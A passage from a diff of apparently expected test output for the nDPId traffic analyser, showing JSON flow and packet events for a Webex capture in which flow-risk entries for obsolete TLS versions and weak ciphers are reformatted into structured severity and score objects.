+01854{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570633357,"flow_last_seen":1444570633357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570633357,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1444570633357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570633357,"pkt":"ABoRAAACABoRAAABCABFAAA87DBAAEAGmtcKCAABQERpZ6GOAbtaKC3iAAAAAKACOQht0gAAAgQFtAQCCAoATMHSAAAAAAEDAwY="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1444570633360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAoAXpAABAGtaJARGlnCggAAQG7oY6l19IdWigt41AS\/\/9Y1AAA"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1444570633360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAo7DFAAEAGmuoKCAABQERpZ6GOAbtaKC3jpdfSHlAQOQgfzQAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636151,"flow_last_seen":1444570636151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1444570636151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636151,"pkt":"ABoRAAACABoRAAABCABFAAA8tbVAAEAGMwwKCAABch3V1KL+AbsYGndcAAAAAKACOQjFmAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1444570636154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAoAY1AABAGF0lyHdXUCggAAQG7ov7n5YijGBp3XVAS\/\/+5HQAA"}
@@ -56,24 +56,24 @@
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636155,"flow_last_seen":1444570636155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636155,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1444570636155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636155,"pkt":"ABoRAAACABoRAAABCABFAAA8NxlAAEAGu0sKCAABch3MMcm+AbvkVPXwAAAAAKACOQhdrAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1444570636157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636157,"pkt":"ABoRAAACABoRAAABCABFAAAoAY5AABAGIOtyHcwxCggAAQG7yb4bqwoP5FT18VAS\/\/+cAAAA"}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1444570636158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636158,"pkt":"ABoRAAACABoRAAABCABFAAAoNxpAAEAGu14KCAABch3MMcm+AbvkVPXxG6sKEFAQOQhi+QAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636160,"flow_last_seen":1444570636160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636160,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1444570636160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636160,"pkt":"ABoRAAACABoRAAABCABFAAA80GxAAEAGr+EKCAAB0cXen7mKAbt7nBKGAAAAAKACOQhH7AAAAgQFtAQCCAoATMLqAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1444570636163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAoAZFAABAGrtHRxd6fCggAAQG7uYqEY+15e5wSh1AS\/\/86HgAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1444570636163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAo0G1AAEAGr\/QKCAAB0cXen7mKAbt7nBKHhGPtelAQOQgBFwAA"}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636170,"flow_last_seen":1444570636170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636170,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1444570636170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636170,"pkt":"ABoRAAACABoRAAABCABFAAA8c99AAEAGAvcKCAABQER5meEvAbvnI7E0AAAAAKACOQgMmAAAAgQFtAQCCAoATMLrAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1444570636175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoAZNAABAGpVdARHmZCggAAQG74S8Y3E7L5yOxNVAS\/\/8JAQAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1444570636175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoc+BAAEAGAwoKCAABQER5meEvAbvnI7E1GNxOzFAQOQjP+QAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636180,"flow_last_seen":1444570636180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636180,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1444570636180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636180,"pkt":"ABoRAAACABoRAAABCABFAAA8nw9AAEAGbDMKCAABPm3nA7L2AbufQl3jAAAAAKACOQhqbwAAAgQFtAQCCAoATMLsAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1444570636183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAoAZVAABAGOcI+becDCggAAQG7svZgvaIcn0Jd5FAS\/\/\/LpgAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1444570636183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAonxBAAEAGbEYKCAABPm3nA7L2AbufQl3kYL2iHVAQOQiSnwAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 